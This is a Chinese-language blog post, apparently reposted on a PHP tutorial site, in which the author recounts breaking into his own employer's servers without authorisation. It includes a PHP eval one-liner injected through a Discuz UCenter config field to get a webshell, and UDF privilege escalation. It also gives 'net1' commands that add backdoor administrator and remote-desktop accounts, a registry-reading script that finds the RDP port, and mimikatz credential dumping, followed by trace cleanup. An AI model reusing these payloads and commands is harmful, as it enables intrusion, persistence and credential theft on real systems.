来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 目录:1.巧社论坛创始人密码2.UC配置拿取shell3.初探权限及提权4.无NET提权5.PHP注册表查看3389端口6.mimikatz一键抓取明文-------------------------------------------------------------------------开始。1.......
目录:
1.巧社论坛创始人密码 2.UC配置拿取shell 3.初探权限及提权 4.无NET提权 5.PHP注册表查看3389端口 6.mimikatz一键抓取明文 ------------------------------------------------------------------------- 开始。 1.巧社论坛创始人密码 公司的论坛以及网站我当然熟悉不过了,公司是做CMS的做了将近一年也掌握了点公司的0day 不过不会公布的。公司的一个cms的0day可以进后台拿不到shell很蛋疼啊。 什么web.config这些都可以搞到就是在后台拿不到shell 后来没办法,想了想既然自己的CMS拿不到shell不如尝试一下论坛之类的。 确实公司服务器上面有两个论坛 一个DX2.5 一个 DZ 7.2 小弟没有0day秒不掉,无意间发现DX2.5有很多垃圾广告,因为那个是给CMS演示UC整合的。所以可能他们没有管,我就想了想,有那么多广告对公司也不好啊。不如看看可以拿取到创始人账号密码不 原先好几千条垃圾广告,注册会员上W。被我清理了。 然后中午吃饭,小弟就提起说我们那个演示论坛很多垃圾广告 然后老板很爽快的说,这件事吃饭回去之后你半小时把那些全部删除以及处理 我说哦了。 果断吃饭完老板发来账号密码 貌似还是创始人的。 2.UC配置拿取shell 在UCip地址里面填写 经过处理的一句话如下 Madman\\');eval($_POST[a])?>;// QQ 然后保存 连接地址:90sec.org/config/config_ucenter.php 很简单的拿到webshell 3.初探权限及提权 既然拿到shell 我们就会上大马看看权限什么的。 果断上老衲的大马,呵呵没那么简单,不管上什么asp版的马都访问不了。完全不了解情况。 小马 大马 以及啊D的asp版的扫描目录的也访问不了。 这点很疑惑。到后面俺终于知道为什么呢,后面告诉你们 然后没办法先用菜刀访问一些自己了解的目录 不访问不知道,一访问吓一跳,当初进公司没几天就知道两个老板都是玩黑客起家的谁知道目录权限那么差 这权限神级的设置的。估计只有helen设置的出来吧。哈哈 拿既然权限那么大,而且还支持aspx就上aspx看看 有权限执行,先看看权限是什么。 哎,不是系统权限,以为这个傻X老板会给system 不行啊, www.2cto.com 找了找第三方软件也没找到什么好的,后面找到一个root 就在bbs里面 强大的老板root怎么可以放在config里面呢?哎 佩服。 这密码,我惊呆了,你密码搞的那么好,权限什么的都不设置有鸟用 有了root上PHP大马或者UDF提权马 就上暗月JJ的UDF提权马 填写上信息连接上 这版本UDF提权绝对无鸭梨 啊。不过想简单了,当我执行cmdshell的时候net组建没了。 然后马上下班 了,就没看了,下次不忙了在看,晚上也不能看,电脑被条子查了。哈哈 4.无NET提权 在昨天突然又想起来这个网站,然后就再次把我的一句话连接上,上UDF马,前面的马我全部清除了,以免被发现。他们经常上服务器。 然后又上马儿,感觉还是不行 突然,基友暗月JJ找我不知道什么事,这个工具他修改的,刚刚好问问他什么情况 上了UDF马再次导DLL说不行郁闷了 暗月妹妹说是因为有了这个DLL,我说那直接执行OK吗? 然后我就执行还是不行,在这里特别感谢暗月妹妹的指导。谢谢 他让我看看你进程有什么防御软件不,这个看过了,貌似360还有什么主动防御 好吧 然后他又叫我试一下 net user lx 123456 /ad 果断这个在我原先就试过了。不过为了满足他还试一下 还是不行、叫我whoami看看。好吧就按照他的做。 aspx马上是 普通权限 UDF上面是 system权限 权限看完,他叫我去读hash,小菜蛋疼 啊,读hash管理不在线怎么读。 然后经过一段开导。 月妹妹叫我试一下 net1 哎呀果断奇迹出现。net1老板没有删除。 好吧。 net1秒杀一切 下面提权无压力 5.PHP注册表查看3389端口 然后用户加好之后当然是看3389端口是默认的不,果断失望不是默认的。 月妹妹再次帮助俺,叫我PHP读取注册表3389端口,然后他直接发我脚本 第一次使用这个东西果断好用 <?php $regkey='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber'; $shell = new COM('WScript.Shell'); var_dump($shell->RegRead($regkey)); ?> 端口成功读出 33898 淫才的端口哈哈 不过加管理组的时候发现错误 不过在月妹妹的指导 net1 localgroup "Remote Desktop Users" sb /add 加到这个用户组 还是可以登陆上去的 Remote Desktop Users 然后成功进去之后 我才想起来为什么没加上 administrators这个组了 select cmdshell('net1 user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add') 我输入的命令是这样的 而应该输入的是 select cmdshell('net1 user $darkmoon 123456 /add & net1 localgroup administrators $darkmoon /add') 两个的net都需要修改为net1 后面加了这个用户上去,那个的权限太低 了。 6.mimikatz一键抓取明文 下面为了不让老板发现用户,当然是抓老板他的密码。然后留个一句话后门这样最安全 前几天法客一个PKAV的兄弟发了一个mimikatz改装版的一键抓取明文,果断试一下新鲜出炉的东西 看到这个密码再次惊讶 root密码:iK2pr!@#xidCvvXro2!@#x322!@#XXXXXXXXXXX(xxx就是不告诉你) 服务器密码:#!p!a!s!sw!o!r!d!j!ia!m!i!#XXXXX(xxx就是不告诉你) 然后登陆试一下 登陆正常 清理痕迹走人。记录下密码 文章就到这里,再次谢谢 暗月妹妹的指导 渗透公司服务器到此结束 希望通过啊 写的好辛苦 虽然没亮点 忘记说为什么asp文件访问不了了 因为在IIS的web扩展没有开启ASP 导致所有的asp文件都访问不了。哎。让我情何以堪。。好了结束了 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com